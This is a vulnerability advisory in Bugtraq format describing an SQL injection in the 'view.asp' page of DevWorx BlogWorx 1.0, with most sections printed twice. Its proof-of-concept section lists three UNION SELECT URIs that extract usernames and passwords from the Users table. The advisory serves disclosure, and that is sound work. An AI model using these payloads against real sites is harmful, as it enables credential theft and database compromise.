DevWorx BlogWorx 'view.asp' SQL Injection Vulnerability
BID:28776
Info
DevWorx BlogWorx 'view.asp' SQL Injection Vulnerability
| Bugtraq ID: | 28776 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1915 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 2008 12:00AM |
| Updated: | May 07 2015 05:29PM |
| Credit: | U238 |
| Vulnerable: |
DevWorx BlogWorx 1.0 |
| Not Vulnerable: | |
Discussion
DevWorx BlogWorx 'view.asp' SQL Injection Vulnerability
BlogWorx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BlogWorx 1.0 is vulnerable; other versions may also be affected.
BlogWorx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BlogWorx 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
DevWorx BlogWorx 'view.asp' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users
Solution / Fix
DevWorx BlogWorx 'view.asp' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].